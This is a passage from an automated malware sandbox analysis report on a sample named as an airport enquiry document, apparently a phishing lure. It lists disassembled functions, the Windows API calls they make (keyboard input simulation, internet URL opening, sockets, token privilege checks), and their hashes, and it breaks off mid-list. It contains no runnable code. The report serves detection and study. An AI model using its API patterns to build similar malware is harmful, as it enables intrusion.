              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CF6D58
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6D64
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorLast$__itow__swprintfsocket
            • String ID:
            • API String ID: 2214342067-0
            • Opcode ID: 8b3bb92c2eb668578e40cd4f9bb11c3b0e4ee28c11e7a9a06ea5255942a55fc3
            • Instruction ID: d094884809237fe9a9ae42ac81d0bb94fcd9d062026b64a0be9a3a8ee6c4d959
            • Opcode Fuzzy Hash: 8b3bb92c2eb668578e40cd4f9bb11c3b0e4ee28c11e7a9a06ea5255942a55fc3
            • Instruction Fuzzy Hash: 7641A074740200AFEB20BF24DC86F7A77A5DB44B18F548018FA599B3D2DB759D009B96
            Function 00CF672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
            Download Yara Rule
            APIs
            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00D0F910), ref: 00CF67BA
            • _strlen.LIBCMT ref: 00CF67EC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _strlen
            • String ID:
            • API String ID: 4218353326-0
            • Opcode ID: 5ff397f53450293fea79c9780609cdb95f0a623503caa2ad1fc1d946890faee4
            • Instruction ID: e835e07875a1300fcc86350036e0d5763df37b023980d711b32da311c1e2b2de
            • Opcode Fuzzy Hash: 5ff397f53450293fea79c9780609cdb95f0a623503caa2ad1fc1d946890faee4
            • Instruction Fuzzy Hash: 6641A231A00108ABCB14FBA4DCC5FBEB3A9EF48354F148169FA1A972D2DB30AD04E755
            Function 00CEBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
            Download Yara Rule
            APIs
            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CEBB09
            • GetLastError.KERNEL32(?,00000000), ref: 00CEBB2F
            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CEBB54
            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CEBB80
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateHardLink$DeleteErrorFileLast
            • String ID:
            • API String ID: 3321077145-0
            • Opcode ID: ade1a41c191bf2462d8cba729630a557a21987bb53c965dfb224d4cf0bfd3c99
            • Instruction ID: d6b8323fea6903267a5d1f92521849563b3f909409d585f7271f160052430b1f
            • Opcode Fuzzy Hash: ade1a41c191bf2462d8cba729630a557a21987bb53c965dfb224d4cf0bfd3c99
            • Instruction Fuzzy Hash: E6412939200650DFCF20EF15C584A6EBBE1EF49314B198498EC4A9B762CB34FD01EB95
            Function 00D08AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
            Download Yara Rule
            APIs
            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D08B4D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InvalidateRect
            • String ID:
            • API String ID: 634782764-0
            • Opcode ID: 251f69454cf58469b6a1fd094727faa4a76cd217d63ffbc20c08ab49f34b87c8
            • Instruction ID: deb069900608c49491e811fa3144ce9333ec87a3e398d5d18079e081ef689c07
            • Opcode Fuzzy Hash: 251f69454cf58469b6a1fd094727faa4a76cd217d63ffbc20c08ab49f34b87c8
            • Instruction Fuzzy Hash: 5D3190B4600304BFEB209F18CC85BA93BA4EB06320F684516FAD9D67E1DE31E940A775
            Function 00D0ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
            Download Yara Rule
            APIs
            • ClientToScreen.USER32(?,?), ref: 00D0AE1A
            • GetWindowRect.USER32(?,?), ref: 00D0AE90
            • PtInRect.USER32(?,?,00D0C304), ref: 00D0AEA0
            • MessageBeep.USER32(00000000), ref: 00D0AF11
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Rect$BeepClientMessageScreenWindow
            • String ID:
            • API String ID: 1352109105-0
            • Opcode ID: 1ecc10ec8ba7073a52c4be60371b38ca98f8f40ec726df0c27b2f09258e5e410
            • Instruction ID: 84184794edffc126435336447277235aaee1851cd92fa1f0c1c5af73f6925533
            • Opcode Fuzzy Hash: 1ecc10ec8ba7073a52c4be60371b38ca98f8f40ec726df0c27b2f09258e5e410
            • Instruction Fuzzy Hash: 9B411874A003199FCB11DF58C884BA97BF5FB4A350F2881A9F819DB391D731E941DB62
            Function 00CE0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
            Download Yara Rule
            APIs
            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CE1037
            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CE1053
            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00CE10B9
            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CE110B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: KeyboardState$InputMessagePostSend
            • String ID:
            • API String ID: 432972143-0
            • Opcode ID: 2d29b6232bb73c2a44ec6c67a2f0607b42b9d6b752d20621897f820ba1ffc6df
            • Instruction ID: 23d2319de2e1cd99a3dbd9c11e8319ecfe12dcdbd689afae965936754a1460bb
            • Opcode Fuzzy Hash: 2d29b6232bb73c2a44ec6c67a2f0607b42b9d6b752d20621897f820ba1ffc6df
            • Instruction Fuzzy Hash: 98314D30E446C8AEFF308B678C05BFDBBA9AB45310F1C421AE9A5525D1C3758AE49761
            Function 00CE1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
            Download Yara Rule
            APIs
            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00CE1176
            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CE1192
            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00CE11F1
            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00CE1243
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: KeyboardState$InputMessagePostSend
            • String ID:
            • API String ID: 432972143-0
            • Opcode ID: 2cb56b0c760142bffdf210aebd398347d42c037329cce31da22aa22288b5a98d
            • Instruction ID: ea62e03e9cc5561257b6dd30c3d06fc1b5ad002b10335c206101fb1baeeaca0f
            • Opcode Fuzzy Hash: 2cb56b0c760142bffdf210aebd398347d42c037329cce31da22aa22288b5a98d
            • Instruction Fuzzy Hash: 61312B30A407885AEF348B67CC097FE7BAAAB49310F1C431AEAA5925D1C3748AA59751
            Function 00CB6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CB644B
            • __isleadbyte_l.LIBCMT ref: 00CB6479
            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CB64A7
            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CB64DD
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
            • String ID:
            • API String ID: 3058430110-0
            • Opcode ID: ede988f587fa315f6aea9c3dfeade09fe1e8fd8a504ecb4dc48e2587fd9fd999
            • Instruction ID: bd675139bc2703b536f71edae246c46808b7825dde7d0c8d69148cd42b533629
            • Opcode Fuzzy Hash: ede988f587fa315f6aea9c3dfeade09fe1e8fd8a504ecb4dc48e2587fd9fd999
            • Instruction Fuzzy Hash: 3F31DE31600646AFDB22CF75C844BEB7BA9FF41310F154429F868871A0EB39D951DF90
            Function 00D05175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
            Download Yara Rule
            APIs
            • GetForegroundWindow.USER32 ref: 00D05189
              • Part of subcall function 00CE387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CE3897
              • Part of subcall function 00CE387D: GetCurrentThreadId.KERNEL32 ref: 00CE389E
              • Part of subcall function 00CE387D: AttachThreadInput.USER32(00000000,?,00CE52A7), ref: 00CE38A5
            • GetCaretPos.USER32(?), ref: 00D0519A
            • ClientToScreen.USER32(00000000,?), ref: 00D051D5
            • GetForegroundWindow.USER32 ref: 00D051DB
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
            • String ID:
            • API String ID: 2759813231-0
            • Opcode ID: e6f10d7a48ef714d155690a43f4d8f463c4a0aeb9bed8fcfb42f963f3912f302
            • Instruction ID: 674885def440321ec3ee8a76fcb7eadf2ef47638de2a69b843ca5d085614fe7c
            • Opcode Fuzzy Hash: e6f10d7a48ef714d155690a43f4d8f463c4a0aeb9bed8fcfb42f963f3912f302
            • Instruction Fuzzy Hash: 4B314F71D00208AFCB10EFA5C885AEFB7F9EF88304F14406AE406E7241DA759E00DBA1
            Function 00D0C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • GetCursorPos.USER32(?), ref: 00D0C7C2
            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00CBBBFB,?,?,?,?,?), ref: 00D0C7D7
            • GetCursorPos.USER32(?), ref: 00D0C824
            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00CBBBFB,?,?,?), ref: 00D0C85E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Cursor$LongMenuPopupProcTrackWindow
            • String ID:
            • API String ID: 2864067406-0
            • Opcode ID: 2044ac1acbdd8398ddb834073957dbd70f85f825d48f54d3965bfe06ab7abb36
            • Instruction ID: 3eba1eadf21f764dc7a8b0a646b4c76bc7a814a67bcca3533a0398d949c49f30
            • Opcode Fuzzy Hash: 2044ac1acbdd8398ddb834073957dbd70f85f825d48f54d3965bfe06ab7abb36
            • Instruction Fuzzy Hash: F2318235600118AFCB25CF58CC98FEA7BBAEB4A710F148169F9098B2A1D7319D50DF74
            Function 00CA0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
            Download Yara Rule
            APIs
            • __setmode.LIBCMT ref: 00CA0BF2
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CE7B20,?,?,00000000), ref: 00C85B8C
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CE7B20,?,?,00000000,?,?), ref: 00C85BB0
            • _fprintf.LIBCMT ref: 00CA0C29
            • OutputDebugStringW.KERNEL32(?), ref: 00CD6331
              • Part of subcall function 00CA4CDA: _flsall.LIBCMT ref: 00CA4CF3
            • __setmode.LIBCMT ref: 00CA0C5E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
            • String ID:
            • API String ID: 521402451-0
            • Opcode ID: ed5a6a5b36b751d3efd48495625204759c756c6085af6bdda838ac01052031be
            • Instruction ID: ead35155669d440d130cb63006ac878c5be6f0b25d90b36b01d1e7ddd2d4f466
            • Opcode Fuzzy Hash: ed5a6a5b36b751d3efd48495625204759c756c6085af6bdda838ac01052031be
            • Instruction Fuzzy Hash: DA113A319046057FCB08B7B5AC439BE7B68DF87328F24011AF208972D2DFA15D46A7A6
            Function 00CD8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CD8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CD8669
              • Part of subcall function 00CD8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CD8673
              • Part of subcall function 00CD8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD8682
              • Part of subcall function 00CD8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD8689
              • Part of subcall function 00CD8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD869F
            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00CD8BEB
            • _memcmp.LIBCMT ref: 00CD8C0E
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD8C44
            • HeapFree.KERNEL32(00000000), ref: 00CD8C4B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
            • String ID:
            • API String ID: 1592001646-0
            • Opcode ID: 4173fbb318c7ae3d925c1420b353854b30a45502fed0b0e64190355361cc65d1
            • Instruction ID: af31b789d878f01c19d6bbea857c98070af084c4d7fb1c57c6f8024a331b976e
            • Opcode Fuzzy Hash: 4173fbb318c7ae3d925c1420b353854b30a45502fed0b0e64190355361cc65d1
            • Instruction Fuzzy Hash: AA217F71E11209EFDB10DF94C945BEEB7B8FF84354F14409AE664A7340EB31AA0ADB60
            Function 00CF1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
            Download Yara Rule
            APIs
            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CF1A97
              • Part of subcall function 00CF1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CF1B40
              • Part of subcall function 00CF1B21: InternetCloseHandle.WININET(00000000), ref: 00CF1BDD
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Internet$CloseConnectHandleOpen
            • String ID:
            • API String ID: 1463438336-0
            • Opcode ID: bed6b3c608d844c04a2b2c74f90ea88765f55ad82ba6ceb1f84a8ed508213ff8
            • Instruction ID: ac37349716c68f8f9c5678fd534490feb1f638ecbe8b839d58ef15e8629a5030
            • Opcode Fuzzy Hash: bed6b3c608d844c04a2b2c74f90ea88765f55ad82ba6ceb1f84a8ed508213ff8
            • Instruction Fuzzy Hash: 5F21CF71200608FFDB629F60CC00FBAB7A9FF84711F18001AFF55D6650EB719911ABA6
            Function 00CDE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CDF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CDE1C4,?,?,?,00CDEFB7,00000000,000000EF,00000119,?,?), ref: 00CDF5BC
              • Part of subcall function 00CDF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00CDF5E2
              • Part of subcall function 00CDF5AD: lstrcmpiW.KERNEL32(00000000,?,00CDE1C4,?,?,?,00CDEFB7,00000000,000000EF,00000119,?,?), ref: 00CDF613
            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00CDE1DD
            • lstrcpyW.KERNEL32(00000000,?), ref: 00CDE203
            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00CDE237
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: lstrcmpilstrcpylstrlen
            • String ID: cdecl
            • API String ID: 4031866154-3896280584
            • Opcode ID: 7ab7cf451f794c5a628a966ebaa651c4267a6a6db430b848feb4d977bd649a4c
            • Instruction ID: 03f7ebd4a303f759d918aa95dae143ddbbcaf9ed36c072ac50b265f88634faf6
            • Opcode Fuzzy Hash: 7ab7cf451f794c5a628a966ebaa651c4267a6a6db430b848feb4d977bd649a4c
            • Instruction Fuzzy Hash: 72118E36200345EFCB25AF64DC45A7A77B8FF85350B50402BF91ACB360EB71A951D7A1
            Function 00CB5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 00CB5351
              • Part of subcall function 00CA594C: __FF_MSGBANNER.LIBCMT ref: 00CA5963
              • Part of subcall function 00CA594C: __NMSG_WRITE.LIBCMT ref: 00CA596A
              • Part of subcall function 00CA594C: RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,00CA1013,?), ref: 00CA598F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AllocateHeap_free
            • String ID:
            • API String ID: 614378929-0
            • Opcode ID: 6bc1a4353455d4e4b6516aba86342832464f2ec167186a1529657c80bc005443
            • Instruction ID: 8b96af26d4186743039eecb431a4797c1acd99b8d6b1367d782b42a42c708687
            • Opcode Fuzzy Hash: 6bc1a4353455d4e4b6516aba86342832464f2ec167186a1529657c80bc005443
            • Instruction Fuzzy Hash: 4E11C432904B17AFCB312F74AC4579D37D49F163B4F200429F9149A3A1DBB58A40A750
            Function 00CF667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CE7B20,?,?,00000000), ref: 00C85B8C
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CE7B20,?,?,00000000,?,?), ref: 00C85BB0
            • gethostbyname.WSOCK32(?,?,?), ref: 00CF66AC
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF66B7
            • _memmove.LIBCMT ref: 00CF66E4
            • inet_ntoa.WSOCK32(?), ref: 00CF66EF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
